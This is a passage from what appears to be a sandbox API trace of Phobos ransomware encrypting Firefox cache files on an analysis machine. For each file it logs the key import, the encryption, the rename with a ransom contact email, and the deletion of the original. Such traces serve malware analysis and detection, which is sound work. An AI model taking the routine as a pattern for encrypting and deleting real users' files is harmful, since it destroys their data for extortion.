HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0192.602] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=46718) returned 1 [0192.602] CloseHandle (hObject=0x12c) returned 1 [0192.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01")) returned 0x2020 [0192.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0192.602] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0192.602] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0192.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0192.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0192.603] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0192.603] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb67e, lpOverlapped=0x0) returned 1 [0192.751] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb680, dwBufLen=0xb680 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb680) returned 1 [0192.751] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xb680, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xb680, lpOverlapped=0x0) returned 1 [0192.753] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0192.753] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0192.753] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0192.753] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.753] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0192.753] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.753] CloseHandle (hObject=0x12c) returned 1 [0192.753] CloseHandle (hObject=0x14c) returned 1 [0192.753] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\B60F3d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\b60f3d01")) returned 1 [0192.754] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0192.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0192.755] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=18584) returned 1 [0192.755] CloseHandle (hObject=0x14c) returned 1 [0192.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01")) returned 0x2020 [0192.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0192.755] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0192.756] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0192.756] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0192.757] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0192.757] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0192.757] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4898, lpOverlapped=0x0) returned 1 [0192.866] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x48a0, dwBufLen=0x48a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x48a0) returned 1 [0192.866] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x48a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x48a0, lpOverlapped=0x0) returned 1 [0192.867] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0192.867] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0192.867] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0192.867] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.867] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0192.868] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.868] CloseHandle (hObject=0x14c) returned 1 [0192.868] CloseHandle (hObject=0x12c) returned 1 [0192.868] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01")) returned 1 [0192.869] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0192.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0192.869] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=43525) returned 1 [0192.869] CloseHandle (hObject=0x12c) returned 1 [0192.869] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01")) returned 0x2020 [0192.870] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0192.870] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0192.870] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0192.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0192.871] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0192.871] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0192.871] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xaa05, lpOverlapped=0x0) returned 1 [0192.905] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xaa10, dwBufLen=0xaa10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xaa10) returned 1 [0192.905] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xaa10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xaa10, lpOverlapped=0x0) returned 1 [0192.906] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0192.906] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0192.906] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0192.906] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.906] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0192.906] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.906] CloseHandle (hObject=0x12c) returned 1 [0192.906] CloseHandle (hObject=0x14c) returned 1 [0192.907] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01")) returned 1 [0192.907] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0192.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0192.908] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=42507) returned 1 [0192.908] CloseHandle (hObject=0x14c) returned 1 [0192.908] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01")) returned 0x2020 [0192.908] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0192.909] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0192.909] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0192.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0192.909] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0192.909] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0192.909] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa60b, lpOverlapped=0x0) returned 1 [0193.061] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa610, dwBufLen=0xa610 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa610) returned 1 [0193.061] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa610, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa610, lpOverlapped=0x0) returned 1 [0193.231] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0193.231] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.232] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0193.232] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.232] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0193.232] CryptDestroyKey (hKey=0xa32d28) returned 1 [0193.232] CloseHandle (hObject=0x14c) returned 1 [0193.232] CloseHandle (hObject=0x12c) returned 1 [0193.232] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01")) returned 1 [0193.233] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0193.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.235] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=132419) returned 1 [0193.235] CloseHandle (hObject=0x12c) returned 1 [0193.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01")) returned 0x2020 [0193.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0193.235] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.235] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0193.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0193.236] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0193.236] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0193.236] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x20543, lpOverlapped=0x0) returned 1 [0193.419] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20550, dwBufLen=0x20550 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20550) returned 1 [0193.421] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x20550, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x20550, lpOverlapped=0x0) returned 1 [0193.423] 